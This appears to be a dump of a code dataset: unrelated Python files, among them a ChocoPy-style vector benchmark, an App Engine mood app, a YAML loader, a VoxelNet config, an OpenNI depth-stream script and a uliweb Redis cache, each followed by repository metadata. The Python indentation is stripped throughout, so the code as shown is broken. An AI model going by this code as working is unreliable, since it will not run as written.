# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < v.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
d233c9f5599649fd4c199b8ab075c4f34ddd9e85
|
466574c2399c11c6c0aa11fda8bd5a9c80c05582
|
/earthbeat.py
|
68550468bbab46ce951be6c0646820708c0a1dda
|
[] |
no_license
|
aborilov/Earthbeat
|
167fdd76825508416514a9df9b35e521ddbb1d59
|
d63a202a7f27972047929782854ce550f1e5dfa9
|
refs/heads/master
| 2021-01-01T20:35:28.158758
| 2013-11-15T13:25:40
| 2013-11-15T13:25:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,473
|
py
|
import os
import urllib
import datetime
import logging
logging.getLogger().setLevel(logging.DEBUG)
from google.appengine.api import users
from google.appengine.ext import db
import jinja2
import webapp2
import counter
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
openIdProviders = (
'Gmail.com', # shorter alternative: "Gmail.com"
'Yahoo.com',
'MySpace.com',
'AOL.com',
'MyOpenID.com',
# add more here
)
class Mood(db.Model):
mood = db.BooleanProperty(indexed=True)
name = db.StringProperty(required=True)
date = db.DateTimeProperty()
class User(db.Model):
mood = db.BooleanProperty(indexed=True)
name = db.StringProperty(required=True)
date = db.DateTimeProperty()
class MainPage(webapp2.RequestHandler):
def post(self):
user = users.get_current_user()
if user:
user_id = user.user_id()
mood = self.request.get("mood")
if mood:
if mood == "smile":
change_mood(user_id, True)
else:
change_mood(user_id, False)
self.redirect('/')
def get(self):
user = users.get_current_user()
if user:
template_values = {
'user': user.nickname(),
}
mood = user_mood(user.user_id())
if mood is None:
template_values['mood'] = ""
else:
if mood:
template_values['mood'] = "happy"
else:
template_values['mood'] = "sad"
template_values['smile_count'] = counter.get_count("smile_count")
template_values['cry_count'] = counter.get_count("cry_count")
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.write(template.render(template_values))
else:
self.response.out.write('Hello world! Sign in at: ')
for p in openIdProviders:
p_name = p.split('.')[0] # take "AOL" from "AOL.com"
p_url = p.lower() # "AOL.com" -> "aol.com"
self.response.out.write('[<a href="%s">%s</a>]' % (
users.create_login_url(federated_identity=p_url), p_name))
def user_mood(user_id):
q = db.Query(User).filter(
"name", user_id).fetch(limit=1)
if q and q[0].date.date() == datetime.datetime.now().date():
return q[0].mood
return None
def increment(mood):
if mood:
counter.increment("smile_count")
else:
counter.increment("cry_count")
def change_mood(user_id, mood):
q = db.Query(User).filter(
"name", user_id).fetch(limit=1)
now = datetime.datetime.now()
if q:
user = q[0]
if 1: # user.mood != mood and user.date.date() != now.date():
user.mood = mood
user.date = now
user.put()
poll(user_id, mood)
increment(mood)
else:
u = User(mood=mood,
name=user_id,
date=now)
u.put()
poll(user_id, mood)
increment(mood)
def poll(user_id, mood):
m = Mood(mood=mood,
name=user_id,
date=datetime.datetime.now())
m.put()
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
|
[
"aborilov@gmail.com"
] |
aborilov@gmail.com
|
f7210d705131460adae2a46d876fa95f9dae8a85
|
434da792d4c3ebf1089cb17044c1715731c5e1e5
|
/Base/BaseYaml.py
|
afa04397f842a9386838168abc980b29eb7bbbe4
|
[] |
no_license
|
testervic/AutoApp
|
d21bbb744ed542a1b8d1c9908ccce9be1bb935a9
|
1cdb5df3c268717beb9b746c5b0646606bfa6001
|
refs/heads/master
| 2020-09-29T18:11:08.646327
| 2019-12-23T08:55:55
| 2019-12-23T08:55:55
| 227,090,893
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,160
|
py
|
# -*- coding:utf-8 -*-
import yaml
from yaml.scanner import ScannerError
import os
def getYam(path):
try:
with open(path, encoding='utf-8') as f:
x = yaml.load(f, Loader=yaml.FullLoader)
return [True, x]
except FileNotFoundError:
print("==用例文件不存在==")
app = {'check': [{'element_info': '', 'operate_type': 'get_value', 'find_type': 'ids', 'info': '用例文件不存在'}],
'testinfo': [{'title': '', 'id': '', 'info': '', "msg": ""}],
'testcase': [{'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''},
{'element_info': '', 'msg': "", 'operate_type': '', 'find_type': '', 'info': ''},
{'element_info': '', 'msg': '', 'operate_type': '', 'find_type': '', 'info': ''},
{'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''}]}
return [False, app]
except yaml.scanner.ScannerError:
app = {'check': [{'element_info': '', 'operate_type': 'get_value', 'find_type': 'ids', 'info': '用例文件格式错误'}],
'testinfo': [{'title': '', 'id': '', 'info': '', "msg": " "}],
'testcase': [{'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''},
{'element_info': '', 'msg': "", 'operate_type': '', 'find_type': '', 'info': ''},
{'element_info': '', 'msg': '', 'operate_type': '', 'find_type': '', 'info': ''},
{'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''}]}
print("==用例格式错误==")
return [False, app]
if __name__ == '__main__':
import os
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
t = getYam(PATH("../yaml/test.yaml"))
print(t)
# port = str(random.randint(4700, 4900))
# bpport = str(random.randint(4700, 4900))
# devices = "DU2TAN15AJ049163"
#
# cmd1 = "appium --session-override -p %s -bp %s -U %s" % (port, bpport, devices)
# print(cmd1)
# os.popen(cmd1)
|
[
"469858846@qq.com"
] |
469858846@qq.com
|
8b4b265605947d75c547d6ce871b082b102f0527
|
1cb689e6fe6171b671f8ee89bda376026ad149d8
|
/Heisenberg/xy_loss.py
|
ba6f0b387725eb94c72ed2b7f6355c1927785d39
|
[] |
no_license
|
BlazStojanovic/QptimalSampling
|
be66ad28cdee20057cdbc8e5b6468f9fb086b059
|
6bc98d0bf30dcbdfbb7cca84a9beb35e72fc7143
|
refs/heads/main
| 2023-07-17T09:34:22.140162
| 2021-08-20T10:04:35
| 2021-08-20T10:04:35
| 355,513,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11
|
py
|
xxz_loss.py
|
[
"csc2006@csc20-laptop-06"
] |
csc2006@csc20-laptop-06
|
8b1cb5d2f1d0e67df487661a59631b7b206cf622
|
a2bf77957f205aebd49cdeac24278099d1fdaab6
|
/tasks.py
|
29f9927f8e6a3db3797efae499519ba52ad71a2e
|
[
"MIT"
] |
permissive
|
gerardobort/luigi-slack
|
bf247ba079945ed5323445199f0768494201b00f
|
25672f529eb1b81e0989b15edbcde26b72f835d2
|
refs/heads/master
| 2021-01-20T20:02:53.493878
| 2016-07-21T20:38:52
| 2016-07-21T20:38:52
| 63,797,798
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
from __future__ import print_function
import json
import luigi
from luigi.format import UTF8
@luigi.Task.event_handler(luigi.Event.SUCCESS)
def celebrate_success(task):
"""Will be called directly after a successful execution
of `run` on any Task subclass (i.e. all luigi Tasks)
"""
print("YAY! :D")
@luigi.Task.event_handler(luigi.Event.FAILURE)
def mourn_failure(task, exception):
"""Will be called directly after a failed execution
of `run` on any JobTask subclass
"""
print("OUGH! :(")
from slack import *
from chatterbot import *
if __name__ == "__main__":
luigi.run()
|
[
"gerardo.bort@rga.com"
] |
gerardo.bort@rga.com
|
2841e95e5b631e7efb363c7224bbe1c0da796466
|
7133a0e900c2cd9b30f4f34aad80a2c1648d8cbc
|
/Activity4.py
|
14526be810d690a8a218c012832fbd3d70a4350c
|
[] |
no_license
|
Deepika-Purushan/Python_Activities
|
671db6db37da3ebf5b5f4f1029882df54658eb5f
|
54745f505c0112ff8c6f4fa6ae9631a330cacd66
|
refs/heads/master
| 2022-12-27T13:32:14.469587
| 2020-10-03T15:27:32
| 2020-10-03T15:27:32
| 293,711,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,754
|
py
|
"""
Using Loops:
Enhance the previously written Rock-Paper-Scissors code so that it asks the user if they want to play another round.
If they say 'Yes', the game should begin again.
If they say 'No', the game should exit.
"""
# Get the users names
U1=input("Enter player1 Name: ")
U2=input("Enter player2 Name: ")
while True :
# Get the users choices
Player1_answer = input(U1 + ", do you want to choose rock, paper or scissors? ").lower()
Player2_answer = input(U2 + ", do you want to choose rock, paper or scissors? ").lower()
print(Player1_answer)
print(Player2_answer)
# Run the algorithm to see who win
if Player1_answer == Player2_answer:
print("It's a tie!")
elif Player1_answer == 'rock':
if Player2_answer == 'scissors':
print("Rock wins!")
else:
print("Paper wins!")
elif Player1_answer == 'scissors':
if Player2_answer == 'paper':
print("Scissors win!")
else:
print("Rock wins!")
elif Player1_answer == 'paper':
if Player2_answer == 'rock':
print("Paper wins!")
else:
print("Scissors win!")
else:
print("Invalid input! You have not entered rock, paper or scissors, try again.")
# Get the users choices
Play_again1 = input(U1 + ", do you want to play again ").lower()
Play_again2 = input(U2 + ", do you want to play again ").lower()
if (Play_again1 == 'yes' and Play_again2 == 'yes'):
pass
elif (Play_again1 == 'no' and Play_again2 == 'no'):
raise SystemExit
else:
print("Invalid Input. Exiting the flow")
raise SystemExit
|
[
"noreply@github.com"
] |
Deepika-Purushan.noreply@github.com
|
a66564dda6b8d9dbd83ae9ed5fad79389511b718
|
0c25b0d44a9f9f669d16adee7ff879cf1245a700
|
/config.py
|
d848b34673cc10b823407d9d2196c632fae5d714
|
[
"MIT"
] |
permissive
|
collector-m/best_voxelnet_ever
|
720c2ee7a3ee68d0b0bbe2d9f5efa76cfa784347
|
c175dfb777f9b37d4f4c331df737cc208946acde
|
refs/heads/master
| 2022-01-26T04:20:29.252955
| 2019-07-09T11:53:09
| 2019-07-09T11:53:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,685
|
py
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""VoxelNet config system.
"""
import os
import os.path as osp
import numpy as np
from time import strftime, localtime
from easydict import EasyDict as edict
import math
__C = edict()
# Consumers can get config by:
# import config as cfg
cfg = __C
# for dataset dir
__C.DATA_DIR = osp.abspath(osp.join(os.sep, 'data', 'object'))
# for gpu allocation
__C.GPU_AVAILABLE = '0'
__C.GPU_USE_COUNT = len(__C.GPU_AVAILABLE.split(','))
__C.GPU_MEMORY_FRACTION = 1
# selected object
__C.DETECT_OBJ = 'Car' # Pedestrian/Cyclist
if __C.DETECT_OBJ == 'Car':
__C.Y_MIN = -40
__C.Y_MAX = 40
__C.X_MIN = 0
__C.X_MAX = 70.4
__C.VOXEL_X_SIZE = 0.2
__C.VOXEL_Y_SIZE = 0.2
__C.VOXEL_POINT_COUNT = 35
__C.INPUT_WIDTH = int((__C.X_MAX - __C.X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_HEIGHT = int((__C.Y_MAX - __C.Y_MIN) / __C.VOXEL_Y_SIZE)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO)
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO)
else:
__C.Y_MIN = -20
__C.Y_MAX = 20
__C.X_MIN = 0
__C.X_MAX = 48
__C.VOXEL_X_SIZE = 0.2
__C.VOXEL_Y_SIZE = 0.2
__C.VOXEL_POINT_COUNT = 45
__C.INPUT_WIDTH = int((__C.X_MAX - __C.X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_HEIGHT = int((__C.Y_MAX - __C.Y_MIN) / __C.VOXEL_Y_SIZE)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO)
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO)
# set the log image scale factor
__C.BV_LOG_FACTOR = 4
# for data set type
__C.DATA_SETS_TYPE = 'kitti'
# Root directory of project
__C.CHECKPOINT_DIR = osp.join('checkpoint')
__C.LOG_DIR = osp.join('log')
# for data preprocess
# sensors
__C.VELODYNE_ANGULAR_RESOLUTION = 0.08 / 180 * math.pi
__C.VELODYNE_VERTICAL_RESOLUTION = 0.4 / 180 * math.pi
__C.VELODYNE_HEIGHT = 1.73
# rgb
if __C.DATA_SETS_TYPE == 'kitti':
__C.IMAGE_WIDTH = 1242
__C.IMAGE_HEIGHT = 375
__C.IMAGE_CHANNEL = 3
# top
if __C.DATA_SETS_TYPE == 'kitti':
__C.TOP_Y_MIN = -30
__C.TOP_Y_MAX = +30
__C.TOP_X_MIN = 0
__C.TOP_X_MAX = 80
__C.TOP_Z_MIN = -4.2
__C.TOP_Z_MAX = 0.8
__C.TOP_X_DIVISION = 0.1
__C.TOP_Y_DIVISION = 0.1
__C.TOP_Z_DIVISION = 0.2
__C.TOP_WIDTH = (__C.TOP_X_MAX - __C.TOP_X_MIN) // __C.TOP_X_DIVISION
__C.TOP_HEIGHT = (__C.TOP_Y_MAX - __C.TOP_Y_MIN) // __C.TOP_Y_DIVISION
__C.TOP_CHANNEL = (__C.TOP_Z_MAX - __C.TOP_Z_MIN) // __C.TOP_Z_DIVISION
# for 2d proposal to 3d proposal
__C.PROPOSAL3D_Z_MIN = -2.3 # -2.52
__C.PROPOSAL3D_Z_MAX = 1.5 # -1.02
# for RPN basenet choose
__C.USE_VGG_AS_RPN = 0
__C.USE_RESNET_AS_RPN = 0
__C.USE_RESNEXT_AS_RPN = 0
# for camera and lidar coordination convert
if __C.DATA_SETS_TYPE == 'kitti':
# cal mean from train set
__C.MATRIX_P2 = ([[719.787081, 0., 608.463003, 44.9538775],
[0., 719.787081, 174.545111, 0.1066855],
[0., 0., 1., 3.0106472e-03],
[0., 0., 0., 0]])
# cal mean from train set
__C.MATRIX_T_VELO_2_CAM = ([
[7.49916597e-03, -9.99971248e-01, -8.65110297e-04, -6.71807577e-03],
[1.18652889e-02, 9.54520517e-04, -9.99910318e-01, -7.33152811e-02],
[9.99882833e-01, 7.49141178e-03, 1.18719929e-02, -2.78557062e-01],
[0, 0, 0, 1]
])
# cal mean from train set
__C.MATRIX_R_RECT_0 = ([
[0.99992475, 0.00975976, -0.00734152, 0],
[-0.0097913, 0.99994262, -0.00430371, 0],
[0.00729911, 0.0043753, 0.99996319, 0],
[0, 0, 0, 1]
])
# Faster-RCNN/SSD Hyper params
if __C.DETECT_OBJ == 'Car':
# car anchor
__C.ANCHOR_L = 3.9
__C.ANCHOR_W = 1.6
__C.ANCHOR_H = 1.56
__C.ANCHOR_Z = -1.0 - cfg.ANCHOR_H/2
__C.RPN_POS_IOU = 0.6
__C.RPN_NEG_IOU = 0.45
elif __C.DETECT_OBJ == 'Pedestrian':
# pedestrian anchor
__C.ANCHOR_L = 0.8
__C.ANCHOR_W = 0.6
__C.ANCHOR_H = 1.73
__C.ANCHOR_Z = -0.6 - cfg.ANCHOR_H/2
__C.RPN_POS_IOU = 0.5
__C.RPN_NEG_IOU = 0.35
if __C.DETECT_OBJ == 'Cyclist':
# cyclist anchor
__C.ANCHOR_L = 1.76
__C.ANCHOR_W = 0.6
__C.ANCHOR_H = 1.73
__C.ANCHOR_Z = -0.6 - cfg.ANCHOR_H/2
__C.RPN_POS_IOU = 0.5
__C.RPN_NEG_IOU = 0.35
# for rpn nms
__C.RPN_NMS_POST_TOPK = 20
__C.RPN_NMS_THRESH = 0.1
__C.RPN_SCORE_THRESH = 0.96
# utils
__C.CORNER2CENTER_AVG = True # average version or max version
if __name__ == '__main__':
print('__C.ROOT_DIR = ' + __C.ROOT_DIR)
print('__C.DATA_SETS_DIR = ' + __C.DATA_SETS_DIR)
|
[
"fschaeffler@gmx.de"
] |
fschaeffler@gmx.de
|
209038d26392ee257736b0dc27c13919c17ac550
|
0ae2bb21d7ca71a691e33cb044a0964d380adda2
|
/Linkedin/LC139WrodBreak.py
|
b450b2041308a27de08b2a8551aa987cc89370d2
|
[] |
no_license
|
xwang322/Coding-Interview
|
5d27ec92d6fcbb7b929dd98bb07c968c1e1b2a04
|
ee5beb79038675ce73c6d147ba9249d9a5ca346a
|
refs/heads/master
| 2020-03-10T08:18:34.980557
| 2018-06-24T03:37:12
| 2018-06-24T03:37:12
| 129,282,263
| 2
| 6
| null | 2018-04-19T19:31:24
| 2018-04-12T16:41:28
|
Python
|
UTF-8
|
Python
| false
| false
| 307
|
py
|
class Solution(object):
def wordBreak(self, s, wordDict):
dp = [False for i in range(len(s)+1)]
dp[0] = True
for i in range(1, len(dp)):
for j in range(i):
if s[j:i] in wordDict and dp[j]:
dp[i] = True
return dp[-1]
|
[
"noreply@github.com"
] |
xwang322.noreply@github.com
|
d05de92fbd33752bb64b60d6d4d79c1047be5ebe
|
acd6dd3a0eb2bfb2e8db59d4d2d2fde49b908138
|
/depth-stream/ex5_rgbd_overlayed.py
|
4a6e8f4a0ac05ed789a69bbea3a9ffa7d2e0e906
|
[
"MIT"
] |
permissive
|
jaykim9898/Pothole-Crack-Detection_MRCNN
|
65aab6b42c5a8913ab46b1b07e69008613d5af83
|
f25b4a6c55119d746f4a9bb1c3c14314b8be5501
|
refs/heads/master
| 2023-03-19T18:59:30.336108
| 2018-12-11T03:40:09
| 2018-12-11T03:40:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,231
|
py
|
#!/usr/bin/env python
'''
Created on 19Jun2015
Stream rgb and depth video side-by-side using openni2 opencv-python (cv2).
RGB is overlayed on top on readable-depth. In addition, streams are aligned, mirror-corrected, and synchronized.
Requires the following libraries:
1. OpenNI-Linux-<Platform>-2.2 <Library and driver>
2. primesense-2.2.0.30 <python bindings>
3. Python 2.7+
4. OpenCV 2.4.X
Current features:
1. Convert primensense oni -> numpy
2. Stream and display rgb || depth || rgbd overlayed
3. Keyboard commands
press esc to exit
press s to save current screen and distancemap
4. Sync and registered depth & rgb streams
5. Print distance to center pixel
6. Masks and overlays rgb stream on the depth stream
NOTE:
1. On device streams: IR and RGB streams do not work together
Depth & IR = OK
Depth & RGB = OK
RGB & IR = NOT OK
@author: Carlos Torres <carlitos408@gmail.com>
'''
import numpy as np
import cv2
from primesense import openni2 # , nite2
from primesense import _openni2 as c_api
## Path of the OpenNI redistribution OpenNI2.so or OpenNI2.dll
# Windows
# dist = 'C:\Program Files\OpenNI2\Redist\OpenNI2.dll'
# OMAP
# dist = '/home/carlos/Install/kinect/OpenNI2-Linux-ARM-2.2/Redist/'
# Linux
dist = '/home/carlos/Install/openni2/OpenNI-Linux-x64-2.2/Redist'
## initialize openni and check
openni2.initialize(
dist) # 'C:\Program Files\OpenNI2\Redist\OpenNI2.dll') # accepts the path of the OpenNI redistribution
if (openni2.is_initialized()):
print
"openNI2 initialized"
else:
print
"openNI2 not initialized"
## Register the device
dev = openni2.Device.open_any()
## create the streams stream
rgb_stream = dev.create_color_stream()
depth_stream = dev.create_depth_stream()
##configure the depth_stream
# print 'Get b4 video mode', depth_stream.get_video_mode()
depth_stream.set_video_mode(
c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_DEPTH_1_MM, resolutionX=320, resolutionY=240,
fps=30))
## Check and configure the mirroring -- default is True
# print 'Mirroring info1', depth_stream.get_mirroring_enabled()
depth_stream.set_mirroring_enabled(False)
rgb_stream.set_mirroring_enabled(False)
## start the stream
rgb_stream.start()
depth_stream.start()
## synchronize the streams
dev.set_depth_color_sync_enabled(True) # synchronize the streams
## IMPORTANT: ALIGN DEPTH2RGB (depth wrapped to match rgb stream)
dev.set_image_registration_mode(openni2.IMAGE_REGISTRATION_DEPTH_TO_COLOR)
##help(dev.set_image_registration_mode)
def get_rgb():
"""
Returns numpy 3L ndarray to represent the rgb image.
"""
bgr = np.fromstring(rgb_stream.read_frame().get_buffer_as_uint8(), dtype=np.uint8).reshape(240, 320, 3)
rgb = cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)
return rgb
# get_rgb
def get_depth():
"""
Returns numpy ndarrays representing the raw and ranged depth images.
Outputs:
dmap:= distancemap in mm, 1L ndarray, dtype=uint16, min=0, max=2**12-1
d4d := depth for dislay, 3L ndarray, dtype=uint8, min=0, max=255
Note1:
fromstring is faster than asarray or frombuffer
Note2:
.reshape(120,160) #smaller image for faster response
OMAP/ARM default video configuration
.reshape(240,320) # Used to MATCH RGB Image (OMAP/ARM)
Requires .set_video_mode
"""
dmap = np.fromstring(depth_stream.read_frame().get_buffer_as_uint16(), dtype=np.uint16).reshape(240,
320) # Works & It's FAST
d4d = np.uint8(dmap.astype(float) * 255 / 2 ** 12 - 1) # Correct the range. Depth images are 12bits
d4d = 255 - cv2.cvtColor(d4d, cv2.COLOR_GRAY2RGB)
return dmap, d4d
# get_depth
def mask_rgbd(d4d, rgb, th=0):
"""
Overlays images and uses some blur to slightly smooth the mask
(3L ndarray, 3L ndarray) -> 3L ndarray
th:= threshold
"""
mask = d4d.copy()
# mask = cv2.GaussianBlur(mask, (5,5),0)
idx = (mask > th)
mask[idx] = rgb[idx]
return mask
# mask_rgbd
## main loop
s = 0
done = False
while not done:
key = cv2.waitKey(1) & 255
## Read keystrokes
if key == 27: # terminate
print
"\tESC key detected!"
done = True
elif chr(key) == 's': # screen capture
print
"\ts key detected. Saving image and distance map {}".format(s)
cv2.imwrite("ex5_" + str(s) + '.png', canvas)
np.savetxt("ex5dmap_" + str(s) + '.out', dmap)
# s+=1 # uncomment for multiple captures
# if
## Streams
# RGB
rgb = get_rgb()
# DEPTH
dmap, d4d = get_depth()
# Overlay rgb over the depth stream
rgbd = mask_rgbd(d4d, rgb)
# canvas
canvas = np.hstack((d4d, rgb, rgbd))
## Distance map
print
'Center pixel is {} mm away'.format(dmap[119, 159])
## Display the stream
cv2.imshow('depth || rgb || rgbd', canvas)
# end while
## Release resources
cv2.destroyAllWindows()
rgb_stream.stop()
depth_stream.stop()
openni2.unload()
print("Terminated")
|
[
"jerofad1992@gmail.com"
] |
jerofad1992@gmail.com
|
8152a7e29b7c4824b0d7872ace8893b23c1601e3
|
7334bd8a1d64662b13222916f4f9fa7565ac29c2
|
/uliweb/contrib/objcache/__init__.py
|
be115be84dbb5796acd07603f6416025152862a8
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
nl0x7c2/uliweb
|
9a1a021a80dc9b9b922df9f0ffb019a01ff6da7d
|
1e48e216bce2b105d2fb5776cc3162c83df04fa8
|
refs/heads/master
| 2020-12-26T00:53:11.692556
| 2014-01-15T00:52:13
| 2014-01-15T00:52:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,623
|
py
|
from uliweb import functions
from uliweb.utils.common import log, flat_list
def get_fields(tablename):
from uliweb import settings
tables = settings.get_var('OBJCACHE_TABLES')
if not tablename in tables:
return
return tables[tablename]
def get_id(engine, tablename, id):
return "objcache:%s:%s:%d" % (engine, tablename, id)
def get_redis():
try:
redis = functions.get_redis()
except Exception, e:
log.exception(e)
redis = None
return redis
def check_enable():
from uliweb import settings
if settings.OBJCACHE.enable:
return True
def get_object(model, tablename, id):
"""
Get cached object from redis
if id is None then return None:
"""
from uliweb.utils.common import log
if not id:
return
if not check_enable():
return
redis = get_redis()
if not redis: return
_id = get_id(model.get_engine_name(), tablename, id)
try:
if redis.exists(_id):
v = redis.hgetall(_id)
o = model.load(v)
log.debug("objcache:get:id="+_id)
return o
except Exception, e:
log.exception(e)
def set_object(model, tablename, instance, fields=None):
"""
Only support simple condition, for example: Model.c.id == n
"""
from uliweb import settings
from uliweb.utils.common import log
if not check_enable():
return
if not fields:
fields = get_fields(tablename)
if fields:
redis = get_redis()
if not redis: return
v = instance.dump(fields)
_id = get_id(model.get_engine_name(), tablename, instance.id)
try:
pipe = redis.pipeline()
r = pipe.delete(_id).hmset(_id, v).expire(_id, settings.get_var('OBJCACHE/timeout')).execute()
log.debug("objcache:set:id="+_id)
except Exception, e:
log.exception(e)
else:
log.debug("There is no fields defined or not configured, so it'll not saved in cache, [%s:%d]" % (tablename, instance.id))
def post_save(model, instance, created, data, old_data):
from uliweb.utils.common import log
from uliweb import response
if not check_enable():
return
tablename = model.tablename
fields = get_fields(tablename)
if fields:
#if response is False, then it means you may in batch program
#so it can't use post_commit machenism
def f():
#check if the record has changed
flag = created
if not flag:
flag = bool(filter(lambda x:x in data, fields))
if flag:
set_object(model, tablename, instance)
log.debug("objcache:post_save:id=%d" % instance.id)
if response:
response.post_commit = f
else:
f()
def post_delete(model, instance):
from uliweb.utils.common import log
from uliweb import response
if not check_enable():
return
tablename = model.tablename
if get_fields(tablename):
def f():
_id = get_id(model.get_engine_name(), tablename, instance.id)
redis = get_redis()
if not redis: return
try:
redis.delete(_id)
log.debug("objcache:post_delete:id="+_id)
except Exception, e:
log.exception(e)
if response:
response.post_commit = f
else:
f()
|
[
"limodou@gmail.com"
] |
limodou@gmail.com
|
70c19f6c60566e5868ad044c2d17ad4a71f68c3b
|
7b0d9a419adb0c2317ddcd496924d577cea8e370
|
